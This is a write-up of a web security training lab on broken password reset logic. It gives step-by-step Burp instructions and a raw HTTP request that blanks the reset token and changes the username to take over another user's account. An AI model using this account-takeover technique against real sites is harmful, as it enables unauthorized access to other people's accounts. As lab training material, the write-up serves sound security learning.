Password reset broken logic

Description

This lab’s password reset functionality is vulnerable.

Reproduction and proof of concept

  1. With Burp running, click the Forgot your password? link and enter your own username wiener.

  2. Click the Email client button to view the password reset email that was sent. Click the link in the email and reset your password to whatever you want.

  3. In Burp, go to Proxy -> HTTP history and study the requests and responses for the password reset functionality. Observe that the reset token is provided as a URL query parameter in the reset email. Notice that when you submit your new password, the POST /forgot-password?temp-forgot-password-token request contains the username as hidden input. Send this request to Burp Repeater.

  4. In Burp Repeater, observe that the password reset functionality still works even if you delete the value of the temp-forgot-password-token parameter in both the URL and request body. This confirms that the token is not being checked when you submit the new password.

  5. In your browser, request a new password reset and change your password again. Send the POST /forgot-password?temp-forgot-password-token request to Burp Repeater again.

  6. In Burp Repeater, delete the value of the temp-forgot-password-token parameter in both the URL and request body. Change the username parameter to carlos. Set the new password to whatever you want and send the request.

POST /forgot-password?temp-forgot-password-token= HTTP/1.1
Host: 0a5f002304096594c337933500940061.web-security-academy.net
Cookie: session=3c30RQATbFCz0qgpaKc45Qm5ajYc2omq
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 91
Origin: https://0a5f002304096594c337933500940061.web-security-academy.net
Referer: https://0a5f002304096594c337933500940061.web-security-academy.net/forgot-password?temp-forgot-password-token=NiIOxWb7H8DwNylBdVs7GCoMgHObA4ii
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

temp-forgot-password-token=&username=carlos&new-password-1=whatever&new-password-2=whatever

  1. In your browser, log in to Carlos’s account using the new password you just set. Click My account to solve the lab.

Exploitability

An attacker will need to reset Carlos’s password then log in and access his My account page.